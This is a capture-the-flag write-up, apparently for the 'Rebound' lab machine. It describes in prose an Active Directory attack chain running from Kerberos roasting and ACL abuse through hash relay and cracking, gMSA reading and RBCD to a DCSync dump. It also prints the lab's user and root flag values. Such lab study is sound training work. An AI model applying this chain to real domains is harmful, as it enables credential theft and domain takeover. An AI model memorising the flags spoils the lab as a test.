Last updated
Last updated
Rebound is an Insane Windows machine featuring a tricky Active Directory environment. User enumeration via RID cycling reveals an AS-REP-roastable user, whose TGT is used to Kerberoast another user with a crackable password. Weak ACLs are abused to obtain access to a group with FullControl over an OU, performing a Descendant Object Takeover (DOT), followed by a ShadowCredentials attack on a user with winrm access. On the target system, cross-session relay is leveraged to obtain the NetNTLMv2 hash of a logged-in user, which, once cracked, leads to a gMSA password read. Finally, the gMSA account allows delegation, but without protocol transition. Resource-Based Constrained Delegation (RBCD) is used to impersonate the Domain Controller, enabling a DCSync attack, leading to fully elevated privileges.
IP Address: 10.10.11.231
Nmap Scan
Summary
Before I start, I'd prefer to update /etc/hosts file to prevent further issues and to easily communicate with the box without typing the IP each time.
Service Enumeration
DNS Enumeration
It's always good to try Zone transfer, but it hardly-ever succeeds
RPC & SMB Enumeration
I didn't get anything interesting from RPC, SMB would be the next
I can see, I have Read access on Shared share but unfortunately it's empty
When attempting RID brute with an anonymous login, It failed but succeeded with guest account.
I added the users I found to a wordlist to use it later
LDAP & Kerberos Enumeration
I tried to query ldap anonymously but got nothing from it.
The last option now is Kerberos. With my usernames list, I can try two possible attacks, one common and one new to many people.
ASREP-Roasting Attack
Kerberosting via asreproastable account
Unluckily, cracking the hash failed which made me move to the next possible attack
To perform this attack, we need the latest version of Impacket
This is the option we need
I will try to get some hashes and if succeed, I will output them to a file.
Let's check the validity of these credentials. Authentication to smb worked but LDAP failed
It looks like it needs Kerberos authentication to be enforced, I will try again with -k
I faced kerberos clock skew problem and didn't work with common solutions, so I write this script to sync with kerberos each second. "Not the best way, but it worked :)"
while True;do ntpdate 10.10.11.231;sleep 1;done
With valid domain credentials, I can move to the the domain enumeration process, credentialed enumeration against LDAP, smb, and try password spray. I will start with bloodhound.py
I found that two users shared the same passwords and the third was group not user.
Looking at permission on shares and files inside with spider_plus module but nothing interesting. I will enumerate the domain manually with PowerView.py
User oorend has AddSelf to ServiceMgmt groups, So I'm curious to see the ACLs of this group I found that it had FullControl over Organisational unit (OU) Service Users
When enumerating the Domain object under this OU, I found that it contains winrm_svc account who is a member of Remote Management users, So he can access the machine via winRM
The Exploitation path is: Abuse AddSelf => Abuse FullControl Inhertiance => ChangePassword of winrm_svc or shadow Credentials
Access the machine
User Flag: 46bad1cb1f3b5f3da2945c6f38c92c7c
The password and ACLs are resettled, So I must harry and establish persistent shell
After getting a shell in metasploit, I want to query logged-on users but it didn't give me anything, However when using logon type 9 (network logon), it shows that tbrady user is logged on.
Looking into Bloodhound for privileges of that use, I found that it can read GMSA account hash
To get this account, I can use cross-sission an attack, steal its NTLMv2 hash, and try to crack it.
Following this repo instruction, I get these two commands.
Trying to crack the hash using hashcat and succeeded :))
Now, I can read GMSA hash
I want to enumerate the delegate of the account delegator$
From here, I stopped and couldn't go any further. the constrained delegation here is for http service and I couldn't request a ticket impersonating the administrator or the DC01, So the following attack path is very complicated and I will try to simplify it as I can.
Since I already have control of delegator$ account, I can perform RBCD and add ldap_monitor to ms-ds-allowtoactonbehalfofotheridentity list, so ldap_monitor can impersonate any user in the domain
Requesting Service Ticket as ldap_monitor impersonating the DC01, so the ticket will have forwardable flag
Using this ticket to request another ticket instead of s4u2self and impersonate the DC
Dumping ntds.dit secrets
Access the machine as an administrator
Root Flag: 56bf9cc0fa746883f65ab822f3ceb779
I used this repo to perform the attack:
